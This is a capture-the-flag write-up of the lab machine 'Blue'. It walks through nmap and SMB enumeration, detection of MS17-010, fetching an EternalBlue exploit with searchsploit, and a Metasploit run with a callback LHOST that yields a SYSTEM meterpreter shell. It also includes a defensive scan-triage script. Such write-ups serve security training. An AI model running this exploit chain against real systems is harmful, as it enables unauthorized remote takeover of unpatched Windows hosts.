Blue

Reconnaissance:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.40

135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC

Host script results:
| smb2-time: 
|   date: 2023-12-10T02:48:34
|_  start_date: 2023-12-10T02:39:33
|_clock-skew: mean: 0s, deviation: 1s, median: 0s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-12-10T02:48:33+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O -p- 10.10.10.40

nmap found the three standard Windows ports, RPC (135), NetBIOS (139), and SMB (445), as well as several high RPC-associated ports in the 49000s. The SMB output says this is Windows 7 Professional.

SMB - TCP 445

Shares: There are a couple of shares with null-session read access (the trick of giving smbmap wrong creds works here):

┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.10.40

┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.10.40 -u "0xdf" -p "0xdf"
[+] IP: 10.10.10.40:445 Name: 10.10.10.40               Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        Share                                                   READ ONLY
        Users                                                   READ ONLY

Share is empty:

┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.10.40/share

Users has just empty Default and Public folders:

┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.10.40/users

Vulns: nmap has vuln scripts that check for known vulnerabilities in a service. I'll run them here, and they find a big one, MS17-010:

┌──(kali㉿kali)-[~]
└─$ nmap -v -script smb-vuln* -p 139,445 10.10.10.40 

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
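As an added example (not part of the original writeup), a small Python triage script that parses nmap's "Host script results" block above and turns the signing, guest-access and smb-vuln findings into a prioritised list; this is the kind of check a defender runs over scan output for a whole subnet rather than reading it host by host. The sample input is constructed from the output shown on this page.

```python
import re

# Constructed sample: the "Host script results" block from the smb-vuln* scan above.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
"""

# A script header is "| name:" or "|_name:"; its sub-lines are indented further.
SCRIPT_HEADER = re.compile(r"^\|(?: |_)([a-z0-9-]+):\s*(.*)$")

def parse_host_scripts(text):
    """Group nmap's '|'-prefixed NSE output into {script_name: [lines]}."""
    scripts, current = {}, None
    for line in text.splitlines():
        m = SCRIPT_HEADER.match(line)
        if m:
            current = m.group(1)
            scripts[current] = [m.group(2)] if m.group(2) else []
        elif current and line.startswith("|"):
            scripts[current].append(line.lstrip("|_ ").rstrip())
    return scripts

def triage(scripts):
    """Map the parsed scripts to (finding, severity) pairs, critical first."""
    findings = []
    smb2 = " ".join(scripts.get("smb2-security-mode", []))
    smb1 = " ".join(scripts.get("smb-security-mode", []))
    if "not required" in smb2 or "message_signing: disabled" in smb1:
        findings.append(("SMB signing not enforced", "medium"))
    if "account_used: guest" in smb1:
        findings.append(("guest/null session accepted", "medium"))
    for name, lines in scripts.items():
        if name.startswith("smb-vuln-") and "State: VULNERABLE" in lines:
            cves = ",".join(re.findall(r"CVE-\d{4}-\d+", " ".join(lines)))
            findings.append((f"{name} ({cves})", "critical"))
    return sorted(findings, key=lambda f: f[1] != "critical")
```

Feed it the saved normal output of a scan (`nmap -oN`) and the first entry it returns for this host is the ms17-010 finding, which is the one to patch before anything else.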

Exploitation: Shell as System

MS17-010, otherwise known as ETERNALBLUE, is an unauthenticated remote code execution vulnerability in Windows SMB, most famous for its leak by the Shadow Brokers and for driving the WannaCry worm in May 2017.

The exploits in Metasploit for MS17-010 are much more stable than the Python script counterparts. If you're doing this in the real world, I'd strongly recommend using Metasploit here. If you're doing this for some kind of training activity that doesn't allow Metasploit (like OSCP), then the downside of crashing a few boxes is acceptable. I'll show both.

Metasploit: Search for a non-Metasploit exploit in the Exploit Database:

┌──(kali㉿kali)-[~]
└─$ searchsploit --id MS17-010
------------------------------------------------------------ ---------------------------------
 Exploit Title                                              |  EDB-ID
------------------------------------------------------------ ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'Eter | 43970
Microsoft Windows - SMB Remote Code Execution Scanner (MS17 | 41891
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code | 42031
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalB | 42315
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB R | 42030
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SM | 41987
------------------------------------------------------------ ---------------------------------

We're working with Windows 7, so we'll use exploit 42315. Copy the exploit into the working directory with searchsploit -m:

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 42315
  Exploit: Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
      URL: https://www.exploit-db.com/exploits/42315
     Path: /usr/share/exploitdb/exploits/windows/remote/42315.py
    Codes: CVE-2017-0144
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/42315.py
┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole

msf6 > search ms17-010
msf6 > use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.8
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Running it returns a shell as SYSTEM:

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

meterpreter > getuid 
meterpreter > shell
